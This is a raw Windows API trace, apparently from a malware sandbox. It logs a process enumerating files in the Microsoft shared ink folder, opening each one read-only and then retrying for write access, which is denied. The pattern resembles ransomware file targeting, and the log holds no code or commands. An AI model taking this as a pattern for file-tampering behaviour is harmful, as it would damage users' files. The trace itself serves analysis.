[0083.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0083.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0083.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0083.976] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0083.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.252] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0084.253] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.253] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0084.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0084.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0084.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.254] AreFileApisANSI () returned 1 [0084.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.255] AreFileApisANSI () returned 1 [0084.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0084.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0084.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 73 [0084.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.255] GetFileType (hFile=0x348) returned 0x1 [0084.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0084.255] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.255] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.255] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.256] CloseHandle (hObject=0x348) returned 1 [0084.256] AreFileApisANSI () returned 1 [0084.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0084.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0084.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 73 [0084.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.256] GetLastError () returned 0x5 [0084.256] GetLastError () returned 0x5 [0084.256] SetLastError (dwErrCode=0x5) [0084.256] GetLastError () returned 0x5 [0084.256] SetLastError (dwErrCode=0x5) [0084.256] GetLastError () returned 0x5 [0084.256] SetLastError (dwErrCode=0x5) [0084.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.257] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0084.257] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0084.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0084.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0084.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0084.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.258] AreFileApisANSI () returned 1 [0084.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", lpUsedDefaultChar=0x0) returned 67 [0084.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.258] AreFileApisANSI () returned 1 [0084.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0084.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82688 [0084.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 67 [0084.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0084.287] GetFileType (hFile=0x334) returned 0x1 [0084.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0084.287] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.287] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.287] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.288] CloseHandle (hObject=0x334) returned 1 [0084.288] AreFileApisANSI () returned 1 [0084.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0084.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82058 [0084.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 67 [0084.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.288] GetLastError () returned 0x5 [0084.288] GetLastError () returned 0x5 [0084.288] SetLastError (dwErrCode=0x5) [0084.288] GetLastError () returned 0x5 [0084.288] SetLastError (dwErrCode=0x5) [0084.288] GetLastError () returned 0x5 [0084.288] SetLastError (dwErrCode=0x5) [0084.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0084.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.288] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0084.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0084.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0084.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0084.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0084.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0084.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0084.290] AreFileApisANSI () returned 1 [0084.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization", lpUsedDefaultChar=0x0) returned 68 [0084.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.290] RtlAllocateHeap 